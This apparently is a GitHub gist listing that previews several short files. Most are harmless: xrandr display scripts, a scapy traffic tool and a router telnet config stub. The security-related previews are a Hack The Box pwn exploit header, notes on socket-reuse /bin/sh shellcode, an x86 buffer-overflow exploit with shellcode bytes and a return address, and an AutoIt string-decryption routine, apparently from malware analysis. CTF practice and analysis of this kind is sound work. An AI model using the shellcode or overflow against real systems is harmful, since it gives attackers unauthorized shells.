This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Hackthebox Cyber Apocalypse 2024 | |
Pwn - Oracle | |
""" | |
from pwn import * | |
e = ELF("./oracle_patched") | |
libc = ELF("./libc-2.31.so") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Linux x86-64 - Execve ("/bin/sh") Socket Reuse | |
; Length: 79 bytes | |
; Date: 21/03/2021 | |
; Author: Puttimate "Jusmistic" Thammasaeng | |
; Tested on: x86_64 Debian GNU/Linux | |
; Socket Reuse x86-64 | |
; 1. Finding sockfd using getpeername function. | |
; 2. Call dup2 sockfd with 0,1 and 2. | |
; 3. Execute /bin/sh. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!#/bin/bash | |
xrandx --newmode "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync | |
xrandr --addmode Virtual1 1920x1080_60.00 | |
xrandr --output Virtual1 --mode 1920x1080_60.00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!#/bin/bash | |
xrandx --newmode "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync | |
xrandr --addmode Virtual1 1920x1080_60.00 | |
xrandr --output Virtual1 --mode 1920x1080_60.00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
!#/bin/bash | |
xrandx --newmode "1920x1080_60.00" 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync | |
xrandr --addmode Virtual1 1920x1080_60.00 | |
xrandr --output Virtual1 --mode 1920x1080_60.00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from struct import * | |
""" | |
Exploit for run_as_root x86 | |
""" | |
def solve(): | |
shellcode = b"\xeb\x0b\x5b\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" #shellcode` | |
exploit = b"A"*140 #padding | |
exploit += pack("<I", 0xffffd6f3) # rip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Original Version From https://gist.github.com/thom-s/7b3fcdcb88c0670167ccdd6ebca3c924 | |
""" | |
# Imports | |
from scapy.all import * | |
from pprint import pprint | |
import operator | |
# Parameters | |
interface = "eth0" # Interface you want to use |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Func decrypt_func($cypher_text) | |
$decrypt = "" | |
For $i = 0 To StringLen($cypher_text) | |
; (text,start,count) | |
; $strip_String = StringMid($cypher_text, $i, 1) | |
$strip_String = $cypher_text[$i] | |
; Find substring | |
; StringInStr(string_base, string_to_find, 1 == Case Sensitive) | |
$char_loc = StringInStr($cypher_key_1, $strip_String, 1) | |
; &= Concatenation assignment e.g. $vVar = "one", and then $vVar &= 10 ($vVar is now "one10") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cypher_key_1 = "afZR[dcnP0Wh=)tO}E5\3-+y*Dx'9qHKsiQ?Ykm_v#:FJ1|LC (${4b>Me<^j.A&UBN8I7pzgX]ur/S2V6owlT@G," | |
cypher_key_2 = "KNfemH_VT4^9OF=bZ0E}tj+p? QX[5i6M/#AUIxc*]D$-(.\|n8r@&hJ:1wL<yRq'>oSg3),lW{GuP2YCkdsvzaB7" | |
""" | |
TODO: | |
- Every important function represemt in form | |
Execute(Decypt("Encrypt Text")) | |
- List Function that call decrypt function |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
""" | |
Router 1 config | |
100.2.101.1 | |
""" | |
import getpass | |
import telnetlib | |
import os | |
import subprocess | |
NewerOlder